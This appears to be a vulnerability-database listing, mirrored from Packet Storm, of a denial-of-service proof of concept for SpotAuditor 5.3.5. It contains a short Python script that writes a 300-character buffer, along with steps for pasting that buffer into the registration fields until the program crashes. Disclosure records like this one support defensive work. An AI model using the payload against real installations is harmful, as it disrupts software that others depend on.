Lucene search
K

SpotAuditor 5.3.5 Denial Of Service

🗓️ 23 Feb 2021 00:00:00Reported by Sinem SahinType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 147 Views

SpotAuditor 5.3.5 Denial Of Service vulnerabilit

Code
`# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)  
# Exploit Author : Sinem Şahin  
# Exploit Date: 2021-02-10  
# Vendor Homepage : http://www.nsauditor.com/  
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe  
# Tested on: Windows 7 x64  
# Version: 5.3.5  
  
  
# Steps:   
1- Run the python script. (exploit.py)  
2- Open payload.txt and copy content to clipboard.  
3- Run 'SpotAuditor 5.3.5'.  
4- Register -> Enter Registration Code  
5- Paste clipboard into the "Name" or "Key".  
6- Click on OK.  
7- Crashed.  
  
---> exploit.py <--  
  
#!/usr/bin/env python  
buffer = "\x41" * 300  
  
try:  
f = open("payload.txt","w")  
f.write(buffer)  
f.close()  
print"File okey!!"  
except:  
print "File is not created."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Feb 2021 00:00Current
7.4High risk
Vulners AI Score7.4
147